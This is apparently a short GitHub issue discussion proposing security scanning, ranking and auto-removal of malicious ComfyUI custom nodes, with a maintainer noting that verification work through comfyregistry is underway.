Proposal for Security Enhancements: Verification, Ranking, and Auto-Removal System for Custom Nodes

[rossaai]

---

This is a proposal, but it would be beneficial to add a verification and ranking system for custom nodes before installation to avoid or at least mitigate the risk of sensitive information being accessed from your computer. It's well known that installing any custom node grants nearly full access to your computer without any permission systems or similar safeguards.

A sandbox system or something similar could be implemented, but one of the simpler solutions might be using a regex that scans all files. If it detects calls to APIs, access to process.env, or environment variables, it could flag them. Additionally, custom nodes that have been confirmed to access and hack user systems could be auto-removed to prevent further propagation. An alert should also be displayed in the package manager, informing users that the package has been confirmed to compromise user systems and strongly advising against its installation. This prevents users from independently seeking out the package and potentially compromising their own systems.

Here's an example of how ComfyUI-LLMVision has already compromised people's systems, highlighting the importance of such a measure:

https://www.reddit.com/r/comfyui/comments/1dbls5n/psa_if_youve_used_the_comfyui_llmvision_node_from/

This issue is already occurring in VSCode. A solution that might serve as inspiration is ExtensionTotal, which scans for access to system/root file paths, process.env, and other sensitive information, then assigns a security level ranging from Low to High.

https://medium.com/@bobcristello/millions-at-risk-dangerous-vscode-extensions-uncovered-d4e42e051cb8

https://www.extensiontotal.com/

[ltdrdata]

Already, additional work is being done to add a verification layer to resolve this issue.
Management of trusted nodes will be handled through comfyregistry.